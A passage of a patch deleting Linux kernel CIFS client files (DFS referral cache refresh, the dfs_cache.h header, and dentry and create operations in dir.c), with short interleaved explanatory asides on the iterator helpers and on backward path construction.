+-								server->origin_fullpath))
+-				__refresh_tcon(server->leaf_fullpath + 1, sessions, tcon, false);
+-			__refresh_tcon(server->origin_fullpath + 1, sessions, tcon, false);
+-		}
+-		mutex_unlock(&server->refpath_lock);
+-
+-		cifs_put_tcon(tcon);
+-	}
+-}
+-
+-static void refresh_cache(struct cifs_ses **sessions)
+-{
+-	int i;
+-	struct cifs_ses *ses;
+-	unsigned int xid;
+-	char *ref_paths[CACHE_MAX_ENTRIES];
+-	int count = 0;
+-	struct cache_entry *ce;
+-
+-	/*
+-	 * Refresh all cached entries.  Get all new referrals outside the
+-	 * critical section to avoid starvation while performing SMB2 IOCTL
+-	 * on broken or slow connections.
+-	 *
+-	 * The cache entries may cover more paths than the active mounts
+-	 * (e.g. domain-based DFS referrals or multi-tier DFS setups).
+-	 */
+-	down_read(&htable_rw_lock);
+-	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
+-		struct hlist_head *l = &cache_htable[i];
+-
+-		hlist_for_each_entry(ce, l, hlist) {
+-			if (count == ARRAY_SIZE(ref_paths))
+-				goto out_unlock;
+-			if (hlist_unhashed(&ce->hlist) || !cache_entry_expired(ce) ||
+-			    IS_ERR(find_ipc_from_server_path(sessions, ce->path)))
+-				continue;
+-			ref_paths[count++] = kstrdup(ce->path, GFP_ATOMIC);
+-		}
+-	}
+-
+-out_unlock:
+-	up_read(&htable_rw_lock);
+-
+-	for (i = 0; i < count; i++) {
+-		char *path = ref_paths[i];
+-		struct dfs_info3_param *refs = NULL;
+-		int numrefs = 0;
+-		int rc = 0;
+-
+-		if (!path)
+-			continue;
+-
+-		ses = find_ipc_from_server_path(sessions, path);
+-		if (IS_ERR(ses))
+-			goto next_referral;
+-
+-		xid = get_xid();
+-		rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
+-		free_xid(xid);
+-
+-		if (!rc) {
+-			down_write(&htable_rw_lock);
+-			ce = lookup_cache_entry(path);
+-			/*
+-			 * We need to re-check it because other tasks might have it deleted or
+-			 * updated.
+-			 */
+-			if (!IS_ERR(ce) && cache_entry_expired(ce))
+-				update_cache_entry_locked(ce, refs, numrefs);
+-			up_write(&htable_rw_lock);
+-		}
+-
+-next_referral:
+-		kfree(path);
+-		free_dfs_info_array(refs, numrefs);
+-	}
+-}
+-
+-/*
+- * Worker that will refresh DFS cache and active mounts based on lowest TTL value from a DFS
+- * referral.
+- */
+-static void refresh_cache_worker(struct work_struct *work)
+-{
+-	struct list_head mglist;
+-	struct mount_group *mg, *tmp_mg;
+-	struct cifs_ses *sessions[CACHE_MAX_ENTRIES + 1] = {NULL};
+-	int max_sessions = ARRAY_SIZE(sessions) - 1;
+-	int i = 0, count;
+-
+-	INIT_LIST_HEAD(&mglist);
+-
+-	/* Get references of mount groups */
+-	mutex_lock(&mount_group_list_lock);
+-	list_for_each_entry(mg, &mount_group_list, list) {
+-		kref_get(&mg->refcount);
+-		list_add(&mg->refresh_list, &mglist);
+-	}
+-	mutex_unlock(&mount_group_list_lock);
+-
+-	/* Fill in the local array with a NULL-terminated list of all referral server sessions */
+-	list_for_each_entry(mg, &mglist, refresh_list) {
+-		if (i >= max_sessions)
+-			break;
+-
+-		spin_lock(&mg->lock);
+-		if (i + mg->num_sessions > max_sessions)
+-			count = max_sessions - i;
+-		else
+-			count = mg->num_sessions;
+-		memcpy(&sessions[i], mg->sessions, count * sizeof(mg->sessions[0]));
+-		spin_unlock(&mg->lock);
+-		i += count;
+-	}
+-
+-	if (sessions[0]) {
+-		/* Refresh all active mounts and cached entries */
+-		refresh_mounts(sessions);
+-		refresh_cache(sessions);
+-	}
+-
+-	list_for_each_entry_safe(mg, tmp_mg, &mglist, refresh_list) {
+-		list_del_init(&mg->refresh_list);
+-		kref_put(&mg->refcount, mount_group_release);
+-	}
+-
+-	spin_lock(&cache_ttl_lock);
+-	queue_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
+-	spin_unlock(&cache_ttl_lock);
+-}
+diff --git a/fs/cifs/dfs_cache.h b/fs/cifs/dfs_cache.h
+deleted file mode 100644
+index 52070d1df1897..0000000000000
+--- a/fs/cifs/dfs_cache.h
++++ /dev/null
+@@ -1,97 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * DFS referral cache routines
+- *
+- * Copyright (c) 2018-2019 Paulo Alcantara <palcantara@suse.de>
+- */
+-
+-#ifndef _CIFS_DFS_CACHE_H
+-#define _CIFS_DFS_CACHE_H
+-
+-#include <linux/nls.h>
+-#include <linux/list.h>
+-#include <linux/uuid.h>
+-#include "cifsglob.h"
+-
+-#define DFS_CACHE_TGT_LIST_INIT(var) { .tl_numtgts = 0, .tl_list = LIST_HEAD_INIT((var).tl_list), }
+-
+-struct dfs_cache_tgt_list {
+-	int tl_numtgts;
+-	struct list_head tl_list;
+-};
+-
+-struct dfs_cache_tgt_iterator {
+-	char *it_name;
+-	int it_path_consumed;
+-	struct list_head it_list;
+-};
+-
+-int dfs_cache_init(void);
+-void dfs_cache_destroy(void);
+-extern const struct proc_ops dfscache_proc_ops;
+-
+-int dfs_cache_find(const unsigned int xid, struct cifs_ses *ses, const struct nls_table *cp,
+-		   int remap, const char *path, struct dfs_info3_param *ref,
+-		   struct dfs_cache_tgt_list *tgt_list);
+-int dfs_cache_noreq_find(const char *path, struct dfs_info3_param *ref,
+-			 struct dfs_cache_tgt_list *tgt_list);
+-int dfs_cache_update_tgthint(const unsigned int xid, struct cifs_ses *ses,
+-			     const struct nls_table *cp, int remap, const char *path,
+-			     const struct dfs_cache_tgt_iterator *it);
+-int dfs_cache_noreq_update_tgthint(const char *path, const struct dfs_cache_tgt_iterator *it);
+-int dfs_cache_get_tgt_referral(const char *path, const struct dfs_cache_tgt_iterator *it,
+-			       struct dfs_info3_param *ref);
+-int dfs_cache_get_tgt_share(char *path, const struct dfs_cache_tgt_iterator *it, char **share,
+-			    char **prefix);
+-void dfs_cache_put_refsrv_sessions(const uuid_t *mount_id);
+-void dfs_cache_add_refsrv_session(const uuid_t *mount_id, struct cifs_ses *ses);
+-char *dfs_cache_canonical_path(const char *path, const struct nls_table *cp, int remap);
+-int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb);
+-
+-static inline struct dfs_cache_tgt_iterator *
+-dfs_cache_get_next_tgt(struct dfs_cache_tgt_list *tl,
+-		       struct dfs_cache_tgt_iterator *it)
+-{
+-	if (!tl || list_empty(&tl->tl_list) || !it ||
+-	    list_is_last(&it->it_list, &tl->tl_list))
+-		return NULL;
+-	return list_next_entry(it, it_list);
+-}
+-
+-static inline struct dfs_cache_tgt_iterator *
+-dfs_cache_get_tgt_iterator(struct dfs_cache_tgt_list *tl)
+-{
+-	if (!tl)
+-		return NULL;
+-	return list_first_entry_or_null(&tl->tl_list,
+-					struct dfs_cache_tgt_iterator,
+-					it_list);
+-}
+-
+-static inline void dfs_cache_free_tgts(struct dfs_cache_tgt_list *tl)
+-{
+-	struct dfs_cache_tgt_iterator *it, *nit;
+-
+-	if (!tl || list_empty(&tl->tl_list))
+-		return;
+-	list_for_each_entry_safe(it, nit, &tl->tl_list, it_list) {
+-		list_del(&it->it_list);
+-		kfree(it->it_name);
+-		kfree(it);
+-	}
+-	tl->tl_numtgts = 0;
+-}
+-
+-static inline const char *
+-dfs_cache_get_tgt_name(const struct dfs_cache_tgt_iterator *it)
+-{
+-	return it ? it->it_name : NULL;
+-}
+-
+-static inline int
+-dfs_cache_get_nr_tgts(const struct dfs_cache_tgt_list *tl)
+-{
+-	return tl ? tl->tl_numtgts : 0;
+-}
+-
+-#endif /* _CIFS_DFS_CACHE_H */
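
Taken together, the iterator helpers in this header support the consumption pattern used by the cache code itself (compare mark_for_reconnect_if_needed() in dfs_cache.c above). Schematically, after dfs_cache_find() has populated a target list; this is a fragment, not a standalone program, with error handling elided:

	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
	struct dfs_cache_tgt_iterator *it;

	/* iterate the targets, hint first, then release the list */
	for (it = dfs_cache_get_tgt_iterator(&tl); it;
	     it = dfs_cache_get_next_tgt(&tl, it))
		cifs_dbg(FYI, "target: %s\n", dfs_cache_get_tgt_name(it));
	dfs_cache_free_tgts(&tl);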
+diff --git a/fs/cifs/dir.c b/fs/cifs/dir.c
+deleted file mode 100644
+index e382b794acbed..0000000000000
+--- a/fs/cifs/dir.c
++++ /dev/null
+@@ -1,867 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   vfs operations that deal with dentries
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2009
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/stat.h>
+-#include <linux/slab.h>
+-#include <linux/namei.h>
+-#include <linux/mount.h>
+-#include <linux/file.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "fs_context.h"
+-#include "cifs_ioctl.h"
+-#include "fscache.h"
+-
+-static void
+-renew_parental_timestamps(struct dentry *direntry)
+-{
+-	/* BB check if there is a way to get the kernel to do this or if we
+-	   really need this */
+-	do {
+-		cifs_set_time(direntry, jiffies);
+-		direntry = direntry->d_parent;
+-	} while (!IS_ROOT(direntry));
+-}
+-
+-char *
+-cifs_build_path_to_root(struct smb3_fs_context *ctx, struct cifs_sb_info *cifs_sb,
+-			struct cifs_tcon *tcon, int add_treename)
+-{
+-	int pplen = ctx->prepath ? strlen(ctx->prepath) + 1 : 0;
+-	int dfsplen;
+-	char *full_path = NULL;
+-
+-	/* if no prefix path, simply set path to the root of share to "" */
+-	if (pplen == 0) {
+-		full_path = kzalloc(1, GFP_KERNEL);
+-		return full_path;
+-	}
+-
+-	if (add_treename)
+-		dfsplen = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1);
+-	else
+-		dfsplen = 0;
+-
+-	full_path = kmalloc(dfsplen + pplen + 1, GFP_KERNEL);
+-	if (full_path == NULL)
+-		return full_path;
+-
+-	if (dfsplen)
+-		memcpy(full_path, tcon->tree_name, dfsplen);
+-	full_path[dfsplen] = CIFS_DIR_SEP(cifs_sb);
+-	memcpy(full_path + dfsplen + 1, ctx->prepath, pplen);
+-	convert_delimiter(full_path, CIFS_DIR_SEP(cifs_sb));
+-	return full_path;
+-}
+-
+-/* Note: caller must free return buffer */
+-const char *
+-build_path_from_dentry(struct dentry *direntry, void *page)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	bool prefix = tcon->Flags & SMB_SHARE_IS_IN_DFS;
+-
+-	return build_path_from_dentry_optional_prefix(direntry, page,
+-						      prefix);
+-}
+-
+-char *
+-build_path_from_dentry_optional_prefix(struct dentry *direntry, void *page,
+-				       bool prefix)
+-{
+-	int dfsplen;
+-	int pplen = 0;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	char dirsep = CIFS_DIR_SEP(cifs_sb);
+-	char *s;
+-
+-	if (unlikely(!page))
+-		return ERR_PTR(-ENOMEM);
+-
+-	if (prefix)
+-		dfsplen = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1);
+-	else
+-		dfsplen = 0;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH)
+-		pplen = cifs_sb->prepath ? strlen(cifs_sb->prepath) + 1 : 0;
+-
+-	s = dentry_path_raw(direntry, page, PATH_MAX);
+-	if (IS_ERR(s))
+-		return s;
+-	if (!s[1])	// for root we want "", not "/"
+-		s++;
+-	if (s < (char *)page + pplen + dfsplen)
+-		return ERR_PTR(-ENAMETOOLONG);
+-	if (pplen) {
+-		cifs_dbg(FYI, "using cifs_sb prepath <%s>\n", cifs_sb->prepath);
+-		s -= pplen;
+-		memcpy(s + 1, cifs_sb->prepath, pplen - 1);
+-		*s = '/';
+-	}
+-	if (dirsep != '/') {
+-		/* BB test paths to Windows with '/' in the midst of prepath */
+-		char *p;
+-
+-		for (p = s; *p; p++)
+-			if (*p == '/')
+-				*p = dirsep;
+-	}
+-	if (dfsplen) {
+-		s -= dfsplen;
+-		memcpy(s, tcon->tree_name, dfsplen);
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS) {
+-			int i;
+-			for (i = 0; i < dfsplen; i++) {
+-				if (s[i] == '\\')
+-					s[i] = '/';
+-			}
+-		}
+-	}
+-	return s;
+-}
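
The function builds the path backwards: dentry_path_raw() places the dentry path at the end of the page buffer, and each prefix (mount prepath, then DFS tree name) is prepended by walking the pointer left, avoiding intermediate copies. A minimal userspace sketch of one such prepend step (buffer handling is illustrative):

#include <stdio.h>
#include <string.h>

/* Prepend sep+prefix to the string at s inside buf, moving the pointer left. */
static char *prepend(char *buf, char *s, const char *prefix, char sep)
{
	size_t len = strlen(prefix);

	s -= len + 1;
	if (s < buf)
		return NULL;		/* would overflow: -ENAMETOOLONG */
	s[0] = sep;
	memcpy(s + 1, prefix, len);	/* abuts the existing string */
	return s;
}

int main(void)
{
	char buf[64];
	char *s = buf + sizeof(buf) - sizeof("\\dir\\file");

	memcpy(s, "\\dir\\file", sizeof("\\dir\\file"));	/* dentry path */
	s = prepend(buf, s, "prepath", '\\');		/* cifs_sb prepath */
	printf("%s\n", s);	/* prints \prepath\dir\file */
	return 0;
}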
+-
+-/*
+- * Don't allow path components longer than the server max.
+- * Don't allow the separator character in a path component.
+- * The VFS will not allow "/", but "\" is allowed by posix.
+- */
+-static int
+-check_name(struct dentry *direntry, struct cifs_tcon *tcon)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
+-	int i;
+-
+-	if (unlikely(tcon->fsAttrInfo.MaxPathNameComponentLength &&
+-		     direntry->d_name.len >
+-		     le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength)))
+-		return -ENAMETOOLONG;
+-
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS)) {
+-		for (i = 0; i < direntry->d_name.len; i++) {
+-			if (direntry->d_name.name[i] == '\\') {
+-				cifs_dbg(FYI, "Invalid file name\n");
+-				return -EINVAL;
+-			}
+-		}
+-	}
+-	return 0;
+-}
+-
+-
+-/* Inode operations in similar order to how they appear in Linux file fs.h */
+-
+-static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned int xid,
+-			  struct tcon_link *tlink, unsigned int oflags, umode_t mode, __u32 *oplock,
+-			  struct cifs_fid *fid, struct cifs_open_info_data *buf)
+-{
+-	int rc = -ENOENT;
+-	int create_options = CREATE_NOT_DIR;
+-	int desired_access;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifs_tcon *tcon = tlink_tcon(tlink);
+-	const char *full_path;
+-	void *page = alloc_dentry_path();
+-	struct inode *newinode = NULL;
+-	int disposition;
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct cifs_open_parms oparms;
+-
+-	*oplock = 0;
+-	if (tcon->ses->server->oplocks)
+-		*oplock = REQ_OPLOCK;
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		free_dentry_path(page);
+-		return PTR_ERR(full_path);
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (tcon->unix_ext && cap_unix(tcon->ses) && !tcon->broken_posix_open &&
+-	    (CIFS_UNIX_POSIX_PATH_OPS_CAP &
+-			le64_to_cpu(tcon->fsUnixInfo.Capability))) {
+-		rc = cifs_posix_open(full_path, &newinode, inode->i_sb, mode,
+-				     oflags, oplock, &fid->netfid, xid);
+-		switch (rc) {
+-		case 0:
+-			if (newinode == NULL) {
+-				/* query inode info */
+-				goto cifs_create_get_file_info;
+-			}
+-
+-			if (S_ISDIR(newinode->i_mode)) {
+-				CIFSSMBClose(xid, tcon, fid->netfid);
+-				iput(newinode);
+-				rc = -EISDIR;
+-				goto out;
+-			}
+-
+-			if (!S_ISREG(newinode->i_mode)) {
+-				/*
+-				 * The server may allow us to open things like
+-				 * FIFOs, but the client isn't set up to deal
+-				 * with that. If it's not a regular file, just
+-				 * close it and proceed as if it were a normal
+-				 * lookup.
+-				 */
+-				CIFSSMBClose(xid, tcon, fid->netfid);
+-				goto cifs_create_get_file_info;
+-			}
+-			/* success, no need to query */
+-			goto cifs_create_set_dentry;
+-
+-		case -ENOENT:
+-			goto cifs_create_get_file_info;
+-
+-		case -EIO:
+-		case -EINVAL:
+-			/*
+-			 * EIO could indicate that (posix open) operation is not
+-			 * supported, despite what server claimed in capability
+-			 * negotiation.
+-			 *
+-			 * POSIX open in samba versions 3.3.1 and earlier could
+-			 * incorrectly fail with invalid parameter.
+-			 */
+-			tcon->broken_posix_open = true;
+-			break;
+-
+-		case -EREMOTE:
+-		case -EOPNOTSUPP:
+-			/*
+-			 * EREMOTE indicates DFS junction, which is not handled
+-			 * in posix open.  If either that or op not supported
+-			 * returned, follow the normal lookup.
+-			 */
+-			break;
+-
+-		default:
+-			goto out;
+-		}
+-		/*
+-		 * Fall through to retry using the older open call; this is the
+-		 * case where the server does not support this SMB level and
+-		 * falsely claims the capability (we also get here for the DFS
+-		 * case, which should be rare for paths not covered on files).
+-		 */
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	desired_access = 0;
+-	if (OPEN_FMODE(oflags) & FMODE_READ)
+-		desired_access |= GENERIC_READ; /* is this too little? */
+-	if (OPEN_FMODE(oflags) & FMODE_WRITE)
+-		desired_access |= GENERIC_WRITE;
+-
+-	disposition = FILE_OVERWRITE_IF;
+-	if ((oflags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
+-		disposition = FILE_CREATE;
+-	else if ((oflags & (O_CREAT | O_TRUNC)) == (O_CREAT | O_TRUNC))
+-		disposition = FILE_OVERWRITE_IF;
+-	else if ((oflags & O_CREAT) == O_CREAT)
+-		disposition = FILE_OPEN_IF;
+-	else
+-		cifs_dbg(FYI, "Create flag not set in create function\n");
+-
+-	/*
+-	 * BB add processing to set equivalent of mode - e.g. via CreateX with
+-	 * ACLs
+-	 */
+-
+-	if (!server->ops->open) {
+-		rc = -ENOSYS;
+-		goto out;
+-	}
+-
+-	/*
+-	 * if we're not using unix extensions, see if we need to set
+-	 * ATTR_READONLY on the create call
+-	 */
+-	if (!tcon->unix_ext && (mode & S_IWUGO) == 0)
+-		create_options |= CREATE_OPTION_READONLY;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = desired_access,
+-		.create_options = cifs_create_options(cifs_sb, create_options),
+-		.disposition = disposition,
+-		.path = full_path,
+-		.fid = fid,
+-		.mode = mode,
+-	};
+-	rc = server->ops->open(xid, &oparms, oplock, buf);
+-	if (rc) {
+-		cifs_dbg(FYI, "cifs_create returned 0x%x\n", rc);
+-		goto out;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	/*
+-	 * If Open reported that we actually created a file then we now have to
+-	 * set the mode if possible.
+-	 */
+-	if ((tcon->unix_ext) && (*oplock & CIFS_CREATE_ACTION)) {
+-		struct cifs_unix_set_info_args args = {
+-				.mode	= mode,
+-				.ctime	= NO_CHANGE_64,
+-				.atime	= NO_CHANGE_64,
+-				.mtime	= NO_CHANGE_64,
+-				.device	= 0,
+-		};
+-
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
+-			args.uid = current_fsuid();
+-			if (inode->i_mode & S_ISGID)
+-				args.gid = inode->i_gid;
+-			else
+-				args.gid = current_fsgid();
+-		} else {
+-			args.uid = INVALID_UID; /* no change */
+-			args.gid = INVALID_GID; /* no change */
+-		}
+-		CIFSSMBUnixSetFileInfo(xid, tcon, &args, fid->netfid,
+-				       current->tgid);
+-	} else {
+-		/*
+-		 * BB implement mode setting via Windows security
+-		 * descriptors e.g.
+-		 */
+-		/* CIFSSMBWinSetPerms(xid,tcon,path,mode,-1,-1,nls);*/
+-
+-		/* Could set r/o dos attribute if mode & 0222 == 0 */
+-	}
+-
+-cifs_create_get_file_info:
+-	/* server might mask mode so we have to query for it */
+-	if (tcon->unix_ext)
+-		rc = cifs_get_inode_info_unix(&newinode, full_path, inode->i_sb,
+-					      xid);
+-	else {
+-#else
+-	{
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		/* TODO: Add support for calling POSIX query info here, but passing in fid */
+-		rc = cifs_get_inode_info(&newinode, full_path, buf, inode->i_sb, xid, fid);
+-		if (newinode) {
+-			if (server->ops->set_lease_key)
+-				server->ops->set_lease_key(newinode, fid);
+-			if ((*oplock & CIFS_CREATE_ACTION) && S_ISREG(newinode->i_mode)) {
+-				if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)
+-					newinode->i_mode = mode;
+-				if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
+-					newinode->i_uid = current_fsuid();
+-					if (inode->i_mode & S_ISGID)
+-						newinode->i_gid = inode->i_gid;
+-					else
+-						newinode->i_gid = current_fsgid();
+-				}
+-			}
+-		}
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-cifs_create_set_dentry:
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	if (rc != 0) {
+-		cifs_dbg(FYI, "Create worked, get_inode_info failed rc = %d\n",
+-			 rc);
+-		goto out_err;
+-	}
+-
+-	if (newinode)
+-		if (S_ISDIR(newinode->i_mode)) {
+-			rc = -EISDIR;
+-			goto out_err;
+-		}
+-
+-	d_drop(direntry);
+-	d_add(direntry, newinode);
+-
+-out:
+-	free_dentry_path(page);
+-	return rc;
+-
+-out_err:
+-	if (server->ops->close)
+-		server->ops->close(xid, tcon, fid);
+-	if (newinode)
+-		iput(newinode);
+-	goto out;
+-}
+-
+-int
+-cifs_atomic_open(struct inode *inode, struct dentry *direntry,
+-		 struct file *file, unsigned oflags, umode_t mode)
+-{
+-	int rc;
+-	unsigned int xid;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct cifs_fid fid = {};
+-	struct cifs_pending_open open;
+-	__u32 oplock;
+-	struct cifsFileInfo *file_info;
+-	struct cifs_open_info_data buf = {};
+-
+-	if (unlikely(cifs_forced_shutdown(CIFS_SB(inode->i_sb))))
+-		return -EIO;
+-
+-	/*
+-	 * Posix open is only called (at lookup time) for file create now. For
+-	 * opens (rather than creates), because we do not know if it is a file
+-	 * or directory yet, and current Samba no longer allows us to do posix
+-	 * open on dirs, we could end up wasting an open call on what turns out
+-	 * to be a dir. For file opens, we wait to call posix open till
+-	 * cifs_open.  It could be added to atomic_open in the future but the
+-	 * performance tradeoff of the extra network request when EISDIR or
+-	 * EACCES is returned would have to be weighed against the 50% reduction
+-	 * in network traffic in the other paths.
+-	 */
+-	if (!(oflags & O_CREAT)) {
+-		struct dentry *res;
+-
+-		/*
+-		 * Check for hashed negative dentry. We have already revalidated
+-		 * the dentry and it is fine. No need to perform another lookup.
+-		 */
+-		if (!d_in_lookup(direntry))
+-			return -ENOENT;
+-
+-		res = cifs_lookup(inode, direntry, 0);
+-		if (IS_ERR(res))
+-			return PTR_ERR(res);
+-
+-		return finish_no_open(file, res);
+-	}
+-
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "parent inode = 0x%p name is: %pd and dentry = 0x%p\n",
+-		 inode, direntry, direntry);
+-
+-	tlink = cifs_sb_tlink(CIFS_SB(inode->i_sb));
+-	if (IS_ERR(tlink)) {
+-		rc = PTR_ERR(tlink);
+-		goto out_free_xid;
+-	}
+-
+-	tcon = tlink_tcon(tlink);
+-
+-	rc = check_name(direntry, tcon);
+-	if (rc)
+-		goto out;
+-
+-	server = tcon->ses->server;
+-
+-	if (server->ops->new_lease_key)
+-		server->ops->new_lease_key(&fid);
+-
+-	cifs_add_pending_open(&fid, tlink, &open);
+-
+-	rc = cifs_do_create(inode, direntry, xid, tlink, oflags, mode,
+-			    &oplock, &fid, &buf);
+-	if (rc) {
+-		cifs_del_pending_open(&open);
+-		goto out;
+-	}
+-
+-	if ((oflags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
+-		file->f_mode |= FMODE_CREATED;
+-
+-	rc = finish_open(file, direntry, generic_file_open);
+-	if (rc) {
+-		if (server->ops->close)
+-			server->ops->close(xid, tcon, &fid);
+-		cifs_del_pending_open(&open);
+-		goto out;
+-	}
+-
+-	if (file->f_flags & O_DIRECT &&
+-	    CIFS_SB(inode->i_sb)->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO) {
+-		if (CIFS_SB(inode->i_sb)->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
+-			file->f_op = &cifs_file_direct_nobrl_ops;
+-		else
+-			file->f_op = &cifs_file_direct_ops;
+-	}
+-
+-	file_info = cifs_new_fileinfo(&fid, file, tlink, oplock, buf.symlink_target);
+-	if (file_info == NULL) {
+-		if (server->ops->close)
+-			server->ops->close(xid, tcon, &fid);
+-		cifs_del_pending_open(&open);
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	fscache_use_cookie(cifs_inode_cookie(file_inode(file)),
+-			   file->f_mode & FMODE_WRITE);
+-
+-out:
+-	cifs_put_tlink(tlink);
+-out_free_xid:
+-	free_xid(xid);
+-	cifs_free_open_info(&buf);
+-	return rc;
+-}
+-
+-int cifs_create(struct user_namespace *mnt_userns, struct inode *inode,
+-		struct dentry *direntry, umode_t mode, bool excl)
+-{
+-	int rc;
+-	unsigned int xid = get_xid();
+-	/*
+-	 * BB the access below is probably too much for mknod to request,
+-	 *    but we have to do query and setpathinfo, so requesting less
+-	 *    could fail (unless we want to request getatr and setatr
+-	 *    permissions only).  At least for POSIX we do not have to
+-	 *    request so much.
+-	 */
+-	unsigned oflags = O_EXCL | O_CREAT | O_RDWR;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct cifs_fid fid;
+-	__u32 oplock;
+-	struct cifs_open_info_data buf = {};
+-
+-	cifs_dbg(FYI, "cifs_create parent inode = 0x%p name is: %pd and dentry = 0x%p\n",
+-		 inode, direntry, direntry);
+-
+-	if (unlikely(cifs_forced_shutdown(CIFS_SB(inode->i_sb)))) {
+-		rc = -EIO;
+-		goto out_free_xid;
+-	}
+-
+-	tlink = cifs_sb_tlink(CIFS_SB(inode->i_sb));
+-	rc = PTR_ERR(tlink);
+-	if (IS_ERR(tlink))
+-		goto out_free_xid;
+-
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	if (server->ops->new_lease_key)
+-		server->ops->new_lease_key(&fid);
+-
+-	rc = cifs_do_create(inode, direntry, xid, tlink, oflags, mode, &oplock, &fid, &buf);
+-	if (!rc && server->ops->close)
+-		server->ops->close(xid, tcon, &fid);
+-
+-	cifs_free_open_info(&buf);
+-	cifs_put_tlink(tlink);
+-out_free_xid:
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-int cifs_mknod(struct user_namespace *mnt_userns, struct inode *inode,
+-	       struct dentry *direntry, umode_t mode, dev_t device_number)
+-{
+-	int rc = -EPERM;
+-	unsigned int xid;
+-	struct cifs_sb_info *cifs_sb;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	const char *full_path;
+-	void *page;
+-
+-	if (!old_valid_dev(device_number))
+-		return -EINVAL;
+-
+-	cifs_sb = CIFS_SB(inode->i_sb);
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-
+-	page = alloc_dentry_path();
+-	tcon = tlink_tcon(tlink);
+-	xid = get_xid();
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto mknod_out;
+-	}
+-
+-	rc = tcon->ses->server->ops->make_node(xid, inode, direntry, tcon,
+-					       full_path, mode,
+-					       device_number);
+-
+-mknod_out:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-struct dentry *
+-cifs_lookup(struct inode *parent_dir_inode, struct dentry *direntry,
+-	    unsigned int flags)
+-{
+-	unsigned int xid;
+-	int rc = 0; /* to get around spurious gcc warning, set to zero here */
+-	struct cifs_sb_info *cifs_sb;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *pTcon;
+-	struct inode *newInode = NULL;
+-	const char *full_path;
+-	void *page;
+-	int retry_count = 0;
+-
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "parent inode = 0x%p name is: %pd and dentry = 0x%p\n",
+-		 parent_dir_inode, direntry, direntry);
+-
+-	/* check whether path exists */
+-
+-	cifs_sb = CIFS_SB(parent_dir_inode->i_sb);
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink)) {
+-		free_xid(xid);
+-		return ERR_CAST(tlink);
+-	}
+-	pTcon = tlink_tcon(tlink);
+-
+-	rc = check_name(direntry, pTcon);
+-	if (unlikely(rc)) {
+-		cifs_put_tlink(tlink);
+-		free_xid(xid);
+-		return ERR_PTR(rc);
+-	}
+-
+-	/* can not grab the rename sem here since it would deadlock in
+-	   the cases (e.g. the beginning of sys_rename itself) in which
